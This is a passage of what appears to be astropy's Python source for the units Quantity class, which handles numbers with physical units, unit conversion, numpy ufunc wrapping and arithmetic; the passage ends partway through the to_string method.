# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module defines the `Quantity` object, which represents a number with some
associated units. `Quantity` objects support operations like ordinary numbers,
but will deal with unit conversions internally.
"""
# Standard library
import re
import numbers
from fractions import Fraction
import warnings
import numpy as np
# AstroPy
from .core import (Unit, dimensionless_unscaled, get_current_unit_registry,
UnitBase, UnitsError, UnitConversionError, UnitTypeError)
from .utils import is_effectively_unity
from .format.latex import Latex
from astropy.utils.compat import NUMPY_LT_1_14, NUMPY_LT_1_16, NUMPY_LT_1_17
from astropy.utils.compat.misc import override__dir__
from astropy.utils.exceptions import AstropyDeprecationWarning, AstropyWarning
from astropy.utils.misc import isiterable
from astropy.utils.data_info import ParentDtypeInfo
from astropy import config as _config
from .quantity_helper import (converters_and_unit, can_have_arbitrary_unit,
check_output)
from .quantity_helper.function_helpers import (
SUBCLASS_SAFE_FUNCTIONS, FUNCTION_HELPERS, DISPATCHED_FUNCTIONS,
UNSUPPORTED_FUNCTIONS)
__all__ = ["Quantity", "SpecificTypeQuantity",
"QuantityInfoBase", "QuantityInfo", "allclose", "isclose"]
# We don't want to run doctests in the docstrings we inherit from Numpy
__doctest_skip__ = ['Quantity.*']
_UNIT_NOT_INITIALISED = "(Unit not initialised)"
_UFUNCS_FILTER_WARNINGS = {np.arcsin, np.arccos, np.arccosh, np.arctanh}
class Conf(_config.ConfigNamespace):
"""
Configuration parameters for Quantity
"""
latex_array_threshold = _config.ConfigItem(100,
'The maximum size an array Quantity can be before its LaTeX '
'representation for IPython gets "summarized" (meaning only the first '
'and last few elements are shown with "..." between). Setting this to a '
'negative number means that the value will instead be whatever numpy '
'gets from get_printoptions.')
conf = Conf()
class QuantityIterator:
"""
Flat iterator object to iterate over Quantities
A `QuantityIterator` iterator is returned by ``q.flat`` for any Quantity
``q``. It allows iterating over the array as if it were a 1-D array,
either in a for-loop or by calling its `next` method.
Iteration is done in C-contiguous style, with the last index varying the
fastest. The iterator can also be indexed using basic slicing or
advanced indexing.
See Also
--------
Quantity.flatten : Returns a flattened copy of an array.
Notes
-----
`QuantityIterator` is inspired by `~numpy.ma.core.MaskedIterator`. It
is not exported by the `~astropy.units` module. Instead of
instantiating a `QuantityIterator` directly, use `Quantity.flat`.
"""
def __init__(self, q):
self._quantity = q
self._dataiter = q.view(np.ndarray).flat
def __iter__(self):
return self
def __getitem__(self, indx):
out = self._dataiter.__getitem__(indx)
# For single elements, ndarray.flat.__getitem__ returns scalars; these
# need a new view as a Quantity.
if isinstance(out, type(self._quantity)):
return out
else:
return self._quantity._new_view(out)
def __setitem__(self, index, value):
self._dataiter[index] = self._quantity._to_own_unit(value)
def __next__(self):
"""
Return the next value, or raise StopIteration.
"""
out = next(self._dataiter)
# ndarray.flat._dataiter returns scalars, so need a view as a Quantity.
return self._quantity._new_view(out)
next = __next__
class QuantityInfoBase(ParentDtypeInfo):
# This is on a base class rather than QuantityInfo directly, so that
# it can be used for EarthLocationInfo yet make clear that that class
# should not be considered a typical Quantity subclass by Table.
attrs_from_parent = {'dtype', 'unit'} # dtype and unit taken from parent
_supports_indexing = True
@staticmethod
def default_format(val):
return f'{val.value}'
@staticmethod
def possible_string_format_functions(format_):
"""Iterate through possible string-derived format functions.
A string can either be a format specifier for the format built-in,
a new-style format string, or an old-style format string.
This method is overridden in order to suppress printing the unit
in each row since it is already at the top in the column header.
"""
yield lambda format_, val: format(val.value, format_)
yield lambda format_, val: format_.format(val.value)
yield lambda format_, val: format_ % val.value
class QuantityInfo(QuantityInfoBase):
"""
Container for meta information like name, description, format. This is
required when the object is used as a mixin column within a table, but can
be used as a general way to store meta information.
"""
_represent_as_dict_attrs = ('value', 'unit')
_construct_from_dict_args = ['value']
_represent_as_dict_primary_data = 'value'
def new_like(self, cols, length, metadata_conflicts='warn', name=None):
"""
Return a new Quantity instance which is consistent with the
input ``cols`` and has ``length`` rows.
This is intended for creating an empty column object whose elements can
be set in-place for table operations like join or vstack.
Parameters
----------
cols : list
List of input columns
length : int
Length of the output column object
metadata_conflicts : str ('warn'|'error'|'silent')
How to handle metadata conflicts
name : str
Output column name
Returns
-------
col : Quantity (or subclass)
Empty instance of this class consistent with ``cols``
"""
# Get merged info attributes like shape, dtype, format, description, etc.
attrs = self.merge_cols_attributes(cols, metadata_conflicts, name,
('meta', 'format', 'description'))
# Make an empty quantity using the unit of the last one.
shape = (length,) + attrs.pop('shape')
dtype = attrs.pop('dtype')
# Use zeros so we do not get problems for Quantity subclasses such
# as Longitude and Latitude, which cannot take arbitrary values.
data = np.zeros(shape=shape, dtype=dtype)
# Get arguments needed to reconstruct class
map = {key: (data if key == 'value' else getattr(cols[-1], key))
for key in self._represent_as_dict_attrs}
map['copy'] = False
out = self._construct_from_dict(map)
# Set remaining info attributes
for attr, value in attrs.items():
setattr(out.info, attr, value)
return out
class Quantity(np.ndarray):
"""A `~astropy.units.Quantity` represents a number with some associated unit.
See also: http://docs.astropy.org/en/stable/units/quantity.html
Parameters
----------
value : number, `~numpy.ndarray`, `Quantity` object (sequence), str
The numerical value of this quantity in the units given by unit. If a
`Quantity` or sequence of them (or any other valid object with a
``unit`` attribute), creates a new `Quantity` object, converting to
`unit` units as needed. If a string, it is converted to a number or
`Quantity`, depending on whether a unit is present.
unit : `~astropy.units.UnitBase` instance, str
An object that represents the unit associated with the input value.
Must be an `~astropy.units.UnitBase` object or a string parseable by
the :mod:`~astropy.units` package.
dtype : ~numpy.dtype, optional
The dtype of the resulting Numpy array or scalar that will
hold the value. If not provided, it is determined from the input,
except that any integer and (non-Quantity) object inputs are converted
to float by default.
copy : bool, optional
If `True` (default), then the value is copied. Otherwise, a copy will
only be made if ``__array__`` returns a copy, if value is a nested
sequence, or if a copy is needed to satisfy an explicitly given
``dtype``. (The `False` option is intended mostly for internal use,
to speed up initialization where a copy is known to have been made.
Use with care.)
order : {'C', 'F', 'A'}, optional
Specify the order of the array. As in `~numpy.array`. This parameter
is ignored if the input is a `Quantity` and ``copy=False``.
subok : bool, optional
If `False` (default), the returned array will be forced to be a
`Quantity`. Otherwise, `Quantity` subclasses will be passed through,
or a subclass appropriate for the unit will be used (such as
`~astropy.units.Dex` for ``u.dex(u.AA)``).
ndmin : int, optional
Specifies the minimum number of dimensions that the resulting array
should have. Ones will be pre-pended to the shape as needed to meet
this requirement. This parameter is ignored if the input is a
`Quantity` and ``copy=False``.
Raises
------
TypeError
If the value provided is not a Python numeric type.
TypeError
If the unit provided is not either a :class:`~astropy.units.Unit`
object or a parseable string unit.
Notes
-----
Quantities can also be created by multiplying a number or array with a
:class:`~astropy.units.Unit`. See http://docs.astropy.org/en/latest/units/
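    Examples
    --------
    A short illustration of the multiplication shortcut described in the
    Notes (doctests in this class are skipped via ``__doctest_skip__``):
    >>> from astropy import units as u
    >>> q = 3.0 * u.m / u.s
    >>> q.to(u.km / u.h)
    <Quantity 10.8 km / h>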
"""
# Need to set a class-level default for _equivalencies, or
# Constants can not initialize properly
_equivalencies = []
# Default unit for initialization; can be overridden by subclasses,
# possibly to `None` to indicate there is no default unit.
_default_unit = dimensionless_unscaled
# Ensures views have an undefined unit.
_unit = None
__array_priority__ = 10000
def __new__(cls, value, unit=None, dtype=None, copy=True, order=None,
subok=False, ndmin=0):
if unit is not None:
# convert unit first, to avoid multiple string->unit conversions
unit = Unit(unit)
# if we allow subclasses, allow a class from the unit.
if subok:
qcls = getattr(unit, '_quantity_class', cls)
if issubclass(qcls, cls):
cls = qcls
# optimize speed for Quantity with no dtype given, copy=False
if isinstance(value, Quantity):
if unit is not None and unit is not value.unit:
value = value.to(unit)
# the above already makes a copy (with float dtype)
copy = False
if type(value) is not cls and not (subok and
isinstance(value, cls)):
value = value.view(cls)
if dtype is None:
if not copy:
return value
if value.dtype.kind in 'iu':
dtype = float
return np.array(value, dtype=dtype, copy=copy, order=order,
subok=True, ndmin=ndmin)
# Maybe str, or list/tuple of Quantity? If so, this may set value_unit.
# To ensure array remains fast, we short-circuit it.
value_unit = None
if not isinstance(value, np.ndarray):
if isinstance(value, str):
# The first part of the regex string matches any integer/float;
# the second parts adds possible trailing .+-, which will break
# the float function below and ensure things like 1.2.3deg
# will not work.
pattern = (r'\s*[+-]?'
r'((\d+\.?\d*)|(\.\d+)|([nN][aA][nN])|'
r'([iI][nN][fF]([iI][nN][iI][tT][yY]){0,1}))'
r'([eE][+-]?\d+)?'
r'[.+-]?')
v = re.match(pattern, value)
unit_string = None
try:
value = float(v.group())
except Exception:
raise TypeError('Cannot parse "{}" as a {}. It does not '
'start with a number.'
.format(value, cls.__name__))
unit_string = v.string[v.end():].strip()
if unit_string:
value_unit = Unit(unit_string)
if unit is None:
unit = value_unit # signal no conversion needed below.
elif (isiterable(value) and len(value) > 0 and
all(isinstance(v, Quantity) for v in value)):
# Convert all quantities to the same unit.
if unit is None:
unit = value[0].unit
value = [q.to_value(unit) for q in value]
value_unit = unit # signal below that conversion has been done
if value_unit is None:
# If the value has a `unit` attribute and if not None
# (for Columns with uninitialized unit), treat it like a quantity.
value_unit = getattr(value, 'unit', None)
if value_unit is None:
# Default to dimensionless for no (initialized) unit attribute.
if unit is None:
unit = cls._default_unit
value_unit = unit # signal below that no conversion is needed
else:
try:
value_unit = Unit(value_unit)
except Exception as exc:
raise TypeError("The unit attribute {!r} of the input could "
"not be parsed as an astropy Unit, raising "
"the following exception:\n{}"
.format(value.unit, exc))
if unit is None:
unit = value_unit
elif unit is not value_unit:
copy = False # copy will be made in conversion at end
value = np.array(value, dtype=dtype, copy=copy, order=order,
subok=False, ndmin=ndmin)
# check that array contains numbers or long int objects
if (value.dtype.kind in 'OSU' and
not (value.dtype.kind == 'O' and
isinstance(value.item(() if value.ndim == 0 else 0),
numbers.Number))):
raise TypeError("The value must be a valid Python or "
"Numpy numeric type.")
# by default, cast any integer, boolean, etc., to float
if dtype is None and value.dtype.kind in 'iuO':
value = value.astype(float)
value = value.view(cls)
value._set_unit(value_unit)
if unit is value_unit:
return value
else:
# here we had non-Quantity input that had a "unit" attribute
# with a unit different from the desired one. So, convert.
return value.to(unit)
def __array_finalize__(self, obj):
# If we're a new object or viewing an ndarray, nothing has to be done.
if obj is None or obj.__class__ is np.ndarray:
return
# If our unit is not set and obj has a valid one, use it.
if self._unit is None:
unit = getattr(obj, '_unit', None)
if unit is not None:
self._set_unit(unit)
# Copy info if the original had `info` defined. Because of the way the
# DataInfo works, `'info' in obj.__dict__` is False until the
# `info` attribute is accessed or set.
if 'info' in obj.__dict__:
self.info = obj.info
def __array_wrap__(self, obj, context=None):
if context is None:
# Methods like .squeeze() created a new `ndarray` and then call
# __array_wrap__ to turn the array into self's subclass.
return self._new_view(obj)
raise NotImplementedError('__array_wrap__ should not be used '
'with a context any more, since we require '
'numpy >=1.13. Please raise an issue on '
'https://github.com/astropy/astropy')
def __array_ufunc__(self, function, method, *inputs, **kwargs):
"""Wrap numpy ufuncs, taking care of units.
Parameters
----------
function : callable
ufunc to wrap.
method : str
Ufunc method: ``__call__``, ``at``, ``reduce``, etc.
inputs : tuple
Input arrays.
kwargs : keyword arguments
As passed on, with ``out`` containing possible quantity output.
Returns
-------
result : `~astropy.units.Quantity`
Results of the ufunc, with the unit set properly.
"""
# Determine required conversion functions -- to bring the unit of the
# input to that expected (e.g., radian for np.sin), or to get
# consistent units between two inputs (e.g., in np.add) --
# and the unit of the result (or tuple of units for nout > 1).
converters, unit = converters_and_unit(function, method, *inputs)
out = kwargs.get('out', None)
# Avoid loop back by turning any Quantity output into array views.
if out is not None:
# If pre-allocated output is used, check it is suitable.
# This also returns array view, to ensure we don't loop back.
if function.nout == 1:
out = out[0]
out_array = check_output(out, unit, inputs, function=function)
# Ensure output argument remains a tuple.
kwargs['out'] = (out_array,) if function.nout == 1 else out_array
# Same for inputs, but here also convert if necessary.
arrays = []
for input_, converter in zip(inputs, converters):
input_ = getattr(input_, 'value', input_)
arrays.append(converter(input_) if converter else input_)
# Call our superclass's __array_ufunc__
result = super().__array_ufunc__(function, method, *arrays, **kwargs)
# If unit is None, a plain array is expected (e.g., comparisons), which
# means we're done.
# We're also done if the result was None (for method 'at') or
# NotImplemented, which can happen if other inputs/outputs override
# __array_ufunc__; hopefully, they can then deal with us.
if unit is None or result is None or result is NotImplemented:
return result
return self._result_as_quantity(result, unit, out)
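    # A minimal illustration of the ufunc path above (a hedged sketch; assumes
    # ``import numpy as np`` and ``import astropy.units as u``; the exact repr
    # may vary between numpy versions):
    #     >>> np.add(1. * u.km, 500. * u.m)   # converter rescales m to km
    #     <Quantity 1.5 km>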
def _result_as_quantity(self, result, unit, out):
"""Turn result into a quantity with the given unit.
If no output is given, it will take a view of the array as a quantity,
and set the unit. If output is given, those should be quantity views
of the result arrays, and the function will just set the unit.
Parameters
----------
result : `~numpy.ndarray` or tuple of `~numpy.ndarray`
Array(s) which need to be turned into quantity.
unit : `~astropy.units.Unit`
Unit for the quantities to be returned (or `None` if the result
should not be a quantity). Should be tuple if result is a tuple.
out : `~astropy.units.Quantity` or None
Possible output quantity. Should be `None` or a tuple if result
is a tuple.
Returns
-------
out : `~astropy.units.Quantity`
With units set.
"""
if isinstance(result, (tuple, list)):
if out is None:
out = (None,) * len(result)
return result.__class__(
self._result_as_quantity(result_, unit_, out_)
for (result_, unit_, out_) in
zip(result, unit, out))
if out is None:
# View the result array as a Quantity with the proper unit.
return result if unit is None else self._new_view(result, unit)
# For given output, just set the unit. We know the unit is not None and
# the output is of the correct Quantity subclass, as it was passed
# through check_output.
out._set_unit(unit)
return out
def __quantity_subclass__(self, unit):
"""
Overridden by subclasses to change what kind of view is
created based on the output unit of an operation.
Parameters
----------
unit : UnitBase
The unit for which the appropriate class should be returned
Returns
-------
tuple :
- `Quantity` subclass
- bool: True if subclasses of the given class are ok
"""
return Quantity, True
def _new_view(self, obj=None, unit=None):
"""
Create a Quantity view of some array-like input, and set the unit
By default, return a view of ``obj`` of the same class as ``self`` and
with the same unit. Subclasses can override the type of class for a
given unit using ``__quantity_subclass__``, and can ensure properties
other than the unit are copied using ``__array_finalize__``.
If the given unit defines a ``_quantity_class`` of which ``self``
is not an instance, a view using this class is taken.
Parameters
----------
obj : ndarray or scalar, optional
The array to create a view of. If obj is a numpy or python scalar,
it will be converted to an array scalar. By default, ``self``
is converted.
unit : `UnitBase`, or anything convertible to a :class:`~astropy.units.Unit`, optional
The unit of the resulting object. It is used to select a
subclass, and explicitly assigned to the view if given.
If not given, the subclass and unit will be that of ``self``.
Returns
-------
view : Quantity subclass
"""
# Determine the unit and quantity subclass that we need for the view.
if unit is None:
unit = self.unit
quantity_subclass = self.__class__
elif unit is self.unit and self.__class__ is Quantity:
# The second part is because we should not presume what other
# classes want to do for the same unit. E.g., Constant will
# always want to fall back to Quantity, and relies on going
# through `__quantity_subclass__`.
quantity_subclass = Quantity
else:
unit = Unit(unit)
quantity_subclass = getattr(unit, '_quantity_class', Quantity)
if isinstance(self, quantity_subclass):
quantity_subclass, subok = self.__quantity_subclass__(unit)
if subok:
quantity_subclass = self.__class__
# We only want to propagate information from ``self`` to our new view,
# so obj should be a regular array. By using ``np.array``, we also
# convert python and numpy scalars, which cannot be viewed as arrays
# and thus not as Quantity either, to zero-dimensional arrays.
# (These are turned back into scalar in `.value`)
        # Note that for an ndarray input, the ``np.array`` call costs only
        # about double an ``obj.__class__ is np.ndarray`` check, so this is
        # not worth special-casing.
if obj is None:
obj = self.view(np.ndarray)
else:
obj = np.array(obj, copy=False)
# Take the view, set the unit, and update possible other properties
# such as ``info``, ``wrap_angle`` in `Longitude`, etc.
view = obj.view(quantity_subclass)
view._set_unit(unit)
view.__array_finalize__(self)
return view
def _set_unit(self, unit):
"""Set the unit.
This is used anywhere the unit is set or modified, i.e., in the
        initializer, in ``__imul__`` and ``__itruediv__`` for in-place
multiplication and division by another unit, as well as in
``__array_finalize__`` for wrapping up views. For Quantity, it just
sets the unit, but subclasses can override it to check that, e.g.,
a unit is consistent.
"""
if not isinstance(unit, UnitBase):
# Trying to go through a string ensures that, e.g., Magnitudes with
# dimensionless physical unit become Quantity with units of mag.
unit = Unit(str(unit), parse_strict='silent')
if not isinstance(unit, UnitBase):
raise UnitTypeError(
"{} instances require {} units, not {} instances."
.format(type(self).__name__, UnitBase, type(unit)))
self._unit = unit
def __deepcopy__(self, memo):
# If we don't define this, ``copy.deepcopy(quantity)`` will
# return a bare Numpy array.
return self.copy()
def __reduce__(self):
# patch to pickle Quantity objects (ndarray subclasses), see
# http://www.mail-archive.com/numpy-discussion@scipy.org/msg02446.html
object_state = list(super().__reduce__())
object_state[2] = (object_state[2], self.__dict__)
return tuple(object_state)
def __setstate__(self, state):
# patch to unpickle Quantity objects (ndarray subclasses), see
# http://www.mail-archive.com/numpy-discussion@scipy.org/msg02446.html
nd_state, own_state = state
super().__setstate__(nd_state)
self.__dict__.update(own_state)
info = QuantityInfo()
def _to_value(self, unit, equivalencies=[]):
"""Helper method for to and to_value."""
if equivalencies == []:
equivalencies = self._equivalencies
return self.unit.to(unit, self.view(np.ndarray),
equivalencies=equivalencies)
def to(self, unit, equivalencies=[]):
"""
Return a new `~astropy.units.Quantity` object with the specified unit.
Parameters
----------
unit : `~astropy.units.UnitBase` instance, str
An object that represents the unit to convert to. Must be
an `~astropy.units.UnitBase` object or a string parseable
by the `~astropy.units` package.
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to try if the units are not
directly convertible. See :ref:`unit_equivalencies`.
If not provided or ``[]``, class default equivalencies will be used
(none for `~astropy.units.Quantity`, but may be set for subclasses)
If `None`, no equivalencies will be applied at all, not even any
set globally or within a context.
See also
--------
to_value : get the numerical value in a given unit.
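        Examples
        --------
        A minimal usage sketch; assumes ``import astropy.units as u`` (the
        exact repr may vary with the numpy version).
        >>> (1. * u.km).to(u.m)
        <Quantity 1000. m>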
"""
# We don't use `to_value` below since we always want to make a copy
# and don't want to slow down this method (esp. the scalar case).
unit = Unit(unit)
return self._new_view(self._to_value(unit, equivalencies), unit)
def to_value(self, unit=None, equivalencies=[]):
"""
The numerical value, possibly in a different unit.
Parameters
----------
unit : `~astropy.units.UnitBase` instance or str, optional
The unit in which the value should be given. If not given or `None`,
use the current unit.
equivalencies : list of equivalence pairs, optional
A list of equivalence pairs to try if the units are not directly
convertible (see :ref:`unit_equivalencies`). If not provided or
``[]``, class default equivalencies will be used (none for
`~astropy.units.Quantity`, but may be set for subclasses).
If `None`, no equivalencies will be applied at all, not even any
set globally or within a context.
Returns
-------
value : `~numpy.ndarray` or scalar
The value in the units specified. For arrays, this will be a view
of the data if no unit conversion was necessary.
See also
--------
to : Get a new instance in a different unit.
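        Examples
        --------
        A minimal usage sketch; assumes ``import astropy.units as u``.
        >>> (1. * u.km).to_value(u.m)   # plain numpy scalar, not a Quantity
        1000.0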
"""
if unit is None or unit is self.unit:
value = self.view(np.ndarray)
else:
unit = Unit(unit)
# We want a view if the unit does not change. One could check
# with "==", but that calculates the scale that we need anyway.
# TODO: would be better for `unit.to` to have an in-place flag.
try:
scale = self.unit._to(unit)
except Exception:
# Short-cut failed; try default (maybe equivalencies help).
value = self._to_value(unit, equivalencies)
else:
value = self.view(np.ndarray)
if not is_effectively_unity(scale):
# not in-place!
value = value * scale
# Index with empty tuple to decay array scalars in to numpy scalars.
return value[()]
value = property(to_value,
doc="""The numerical value of this instance.
See also
--------
to_value : Get the numerical value in a given unit.
""")
@property
def unit(self):
"""
A `~astropy.units.UnitBase` object representing the unit of this
quantity.
"""
return self._unit
@property
def equivalencies(self):
"""
A list of equivalencies that will be applied by default during
unit conversions.
"""
return self._equivalencies
@property
def si(self):
"""
Returns a copy of the current `Quantity` instance with SI units. The
value of the resulting object will be scaled.
"""
si_unit = self.unit.si
return self._new_view(self.value * si_unit.scale,
si_unit / si_unit.scale)
@property
def cgs(self):
"""
Returns a copy of the current `Quantity` instance with CGS units. The
value of the resulting object will be scaled.
"""
cgs_unit = self.unit.cgs
return self._new_view(self.value * cgs_unit.scale,
cgs_unit / cgs_unit.scale)
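    # Hedged usage sketch for the ``si`` and ``cgs`` properties (assumes
    # ``import astropy.units as u``; exact reprs may vary):
    #     >>> (1. * u.km).si     # -> <Quantity 1000. m>
    #     >>> (1. * u.km).cgs    # -> <Quantity 100000. cm>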
@property
def isscalar(self):
"""
True if the `value` of this quantity is a scalar, or False if it
is an array-like object.
.. note::
This is subtly different from `numpy.isscalar` in that
`numpy.isscalar` returns False for a zero-dimensional array
(e.g. ``np.array(1)``), while this is True for quantities,
since quantities cannot represent true numpy scalars.
"""
return not self.shape
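    # Hedged sketch (assumes ``import numpy as np`` and
    # ``import astropy.units as u``):
    #     >>> (1. * u.m).isscalar              # True
    #     >>> ([1., 2.] * u.m).isscalar        # False
    #     >>> (np.array(1.) * u.m).isscalar    # True (zero-dimensional array)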
# This flag controls whether convenience conversion members, such
# as `q.m` equivalent to `q.to_value(u.m)` are available. This is
# not turned on on Quantity itself, but is on some subclasses of
# Quantity, such as `astropy.coordinates.Angle`.
_include_easy_conversion_members = False
@override__dir__
def __dir__(self):
"""
Quantities are able to directly convert to other units that
have the same physical type. This function is implemented in
order to make autocompletion still work correctly in IPython.
"""
if not self._include_easy_conversion_members:
return []
extra_members = set()
equivalencies = Unit._normalize_equivalencies(self.equivalencies)
for equivalent in self.unit._get_units_with_same_physical_type(
equivalencies):
extra_members.update(equivalent.names)
return extra_members
def __getattr__(self, attr):
"""
Quantities are able to directly convert to other units that
have the same physical type.
"""
if not self._include_easy_conversion_members:
raise AttributeError(
"'{}' object has no '{}' member".format(
self.__class__.__name__,
attr))
def get_virtual_unit_attribute():
registry = get_current_unit_registry().registry
to_unit = registry.get(attr, None)
if to_unit is None:
return None
try:
return self.unit.to(
to_unit, self.value, equivalencies=self.equivalencies)
except UnitsError:
return None
value = get_virtual_unit_attribute()
if value is None:
raise AttributeError(
"{} instance has no attribute '{}'".format(
self.__class__.__name__, attr))
else:
return value
# Equality needs to be handled explicitly as ndarray.__eq__ gives
# DeprecationWarnings on any error, which is distracting. On the other
# hand, for structured arrays, the ufunc does not work, so we do use
# __eq__ and live with the warnings.
def __eq__(self, other):
try:
if self.dtype.kind == 'V':
return super().__eq__(other)
else:
return np.equal(self, other)
except UnitsError:
return False
except TypeError:
return NotImplemented
def __ne__(self, other):
try:
if self.dtype.kind == 'V':
return super().__ne__(other)
else:
return np.not_equal(self, other)
except UnitsError:
return True
except TypeError:
return NotImplemented
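    # A hedged sketch of the comparison behaviour above (assumes
    # ``import astropy.units as u``): incompatible units do not raise here,
    # they simply compare unequal.
    #     >>> (1. * u.m) == (1. * u.s)   # UnitsError is caught -> False
    #     >>> (1. * u.m) != (1. * u.s)   # -> True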
# Unit conversion operator (<<).
def __lshift__(self, other):
try:
other = Unit(other, parse_strict='silent')
except UnitTypeError:
return NotImplemented
return self.__class__(self, other, copy=False, subok=True)
def __ilshift__(self, other):
try:
other = Unit(other, parse_strict='silent')
except UnitTypeError:
return NotImplemented
try:
factor = self.unit._to(other)
except UnitConversionError:
# Maybe via equivalencies? Now we do make a temporary copy.
try:
value = self._to_value(other)
except UnitConversionError:
return NotImplemented
self.view(np.ndarray)[...] = value
else:
self.view(np.ndarray)[...] *= factor
self._set_unit(other)
return self
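    # Hedged sketch of the ``<<`` unit-conversion operator (assumes
    # ``import astropy.units as u``):
    #     >>> q = 1. * u.km
    #     >>> q << u.m     # new Quantity converted to m
    #     >>> q <<= u.m    # converts the data of q in place; unit becomes m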
def __rlshift__(self, other):
if not self.isscalar:
return NotImplemented
return Unit(self).__rlshift__(other)
# Give warning for other >> self, since probably other << self was meant.
def __rrshift__(self, other):
warnings.warn(">> is not implemented. Did you mean to convert "
"something to this quantity as a unit using '<<'?",
AstropyWarning)
return NotImplemented
# Also define __rshift__ and __irshift__ so we override default ndarray
# behaviour, but instead of emitting a warning here, let it be done by
# other (which likely is a unit if this was a mistake).
def __rshift__(self, other):
return NotImplemented
def __irshift__(self, other):
return NotImplemented
# Arithmetic operations
def __mul__(self, other):
""" Multiplication between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
try:
return self._new_view(self.copy(), other * self.unit)
except UnitsError: # let other try to deal with it
return NotImplemented
return super().__mul__(other)
def __imul__(self, other):
"""In-place multiplication between `Quantity` objects and others."""
if isinstance(other, (UnitBase, str)):
self._set_unit(other * self.unit)
return self
return super().__imul__(other)
def __rmul__(self, other):
""" Right Multiplication between `Quantity` objects and other
objects.
"""
return self.__mul__(other)
def __truediv__(self, other):
""" Division between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
try:
return self._new_view(self.copy(), self.unit / other)
except UnitsError: # let other try to deal with it
return NotImplemented
return super().__truediv__(other)
def __itruediv__(self, other):
"""Inplace division between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
self._set_unit(self.unit / other)
return self
return super().__itruediv__(other)
def __rtruediv__(self, other):
""" Right Division between `Quantity` objects and other objects."""
if isinstance(other, (UnitBase, str)):
return self._new_view(1. / self.value, other / self.unit)
return super().__rtruediv__(other)
def __div__(self, other):
""" Division between `Quantity` objects. """
return self.__truediv__(other)
def __idiv__(self, other):
""" Division between `Quantity` objects. """
return self.__itruediv__(other)
def __rdiv__(self, other):
""" Division between `Quantity` objects. """
return self.__rtruediv__(other)
def __pow__(self, other):
if isinstance(other, Fraction):
# Avoid getting object arrays by raising the value to a Fraction.
return self._new_view(self.value ** float(other),
self.unit ** other)
return super().__pow__(other)
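    # Hedged sketch of the ``Fraction`` special case above (assumes
    # ``from fractions import Fraction`` and ``import astropy.units as u``):
    #     >>> (4. * u.m ** 2) ** Fraction(1, 2)   # -> <Quantity 2. m>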
    # numpy < 1.16 does not implement np.matmul as a ufunc, so ``@`` cannot be
    # handled through __array_ufunc__ and is defined explicitly here.
if NUMPY_LT_1_16:
def __matmul__(self, other):
result_unit = self.unit * getattr(other, 'unit',
dimensionless_unscaled)
result_array = np.matmul(self.value,
getattr(other, 'value', other))
return self._new_view(result_array, result_unit)
def __rmatmul__(self, other):
result_unit = self.unit * getattr(other, 'unit',
dimensionless_unscaled)
result_array = np.matmul(getattr(other, 'value', other),
self.value)
return self._new_view(result_array, result_unit)
# In numpy 1.13, 1.14, a np.positive ufunc exists, but ndarray.__pos__
# does not go through it, so we define it, to allow subclasses to override
# it inside __array_ufunc__. This can be removed if a solution to
# https://github.com/numpy/numpy/issues/9081 is merged.
def __pos__(self):
"""Plus the quantity."""
return np.positive(self)
# other overrides of special functions
def __hash__(self):
return hash(self.value) ^ hash(self.unit)
def __iter__(self):
if self.isscalar:
raise TypeError(
"'{cls}' object with a scalar value is not iterable"
.format(cls=self.__class__.__name__))
# Otherwise return a generator
def quantity_iter():
for val in self.value:
yield self._new_view(val)
return quantity_iter()
def __getitem__(self, key):
try:
out = super().__getitem__(key)
except IndexError:
# We want zero-dimensional Quantity objects to behave like scalars,
# so they should raise a TypeError rather than an IndexError.
if self.isscalar:
raise TypeError(
"'{cls}' object with a scalar value does not support "
"indexing".format(cls=self.__class__.__name__))
else:
raise
# For single elements, ndarray.__getitem__ returns scalars; these
# need a new view as a Quantity.
if type(out) is not type(self):
out = self._new_view(out)
return out
def __setitem__(self, i, value):
# update indices in info if the info property has been accessed
# (in which case 'info' in self.__dict__ is True; this is guaranteed
# to be the case if we're part of a table).
if not self.isscalar and 'info' in self.__dict__:
self.info.adjust_indices(i, value, len(self))
self.view(np.ndarray).__setitem__(i, self._to_own_unit(value))
# __contains__ is OK
def __bool__(self):
"""Quantities should always be treated as non-False; there is too much
potential for ambiguity otherwise.
"""
warnings.warn('The truth value of a Quantity is ambiguous. '
'In the future this will raise a ValueError.',
AstropyDeprecationWarning)
return True
def __len__(self):
if self.isscalar:
raise TypeError("'{cls}' object with a scalar value has no "
"len()".format(cls=self.__class__.__name__))
else:
return len(self.value)
# Numerical types
def __float__(self):
try:
return float(self.to_value(dimensionless_unscaled))
except (UnitsError, TypeError):
raise TypeError('only dimensionless scalar quantities can be '
'converted to Python scalars')
def __int__(self):
try:
return int(self.to_value(dimensionless_unscaled))
except (UnitsError, TypeError):
raise TypeError('only dimensionless scalar quantities can be '
'converted to Python scalars')
def __index__(self):
# for indices, we do not want to mess around with scaling at all,
# so unlike for float, int, we insist here on unscaled dimensionless
try:
assert self.unit.is_unity()
return self.value.__index__()
except Exception:
raise TypeError('only integer dimensionless scalar quantities '
'can be converted to a Python index')
# TODO: we may want to add a hook for dimensionless quantities?
@property
def _unitstr(self):
if self.unit is None:
unitstr = _UNIT_NOT_INITIALISED
else:
unitstr = str(self.unit)
if unitstr:
unitstr = ' ' + unitstr
return unitstr
def to_string(self, unit=None, precision=None, format=None, subfmt=None):
"""
Generate a string representation of the quantity and its unit.
The behavior of this function can be altered via the
`numpy.set_printoptions` function and its various keywords. The
exception to this is the ``threshold`` keyword, which is controlled via
the ``[units.quantity]`` configuration item ``latex_array_threshold``.
This is treated separately because the numpy default of 1000 is too big
for most browsers to handle.
Parameters
----------
unit : `~astropy.units.UnitBase`, optional
Specifies the unit. If not provided,
the unit used to initialize the quantity will be used.
precision : numeric, optional
The level of decimal precision. If `None`, or not provided,
it will be determined from NumPy print options.
format : str, optional
The format of the result. If not provided, an unadorned
string is returned. Supported values are:
- 'latex': Return a LaTeX-formatted string
subfmt : str, optional
Subformat of the result. For the moment,
only used for format="latex". Supported values are:
- 'inline': Use ``$ ... $`` as delimiters.
- 'display': Use ``$\\displaystyle ... $`` as delimiters.
Returns
-------
        str
            A string with the contents of this Quantity.
"""
if unit is not None and unit != self.unit:
return self.to(unit).to_string(
unit=None, precision=precision, format=format, subfmt=subfmt)
formats = {
None: None,
"latex": {
None: ("$", "$"),
"inline": ("$", "$"),
"display": (r"$\displaystyle ", r"$"),
},
}
if format not in formats:
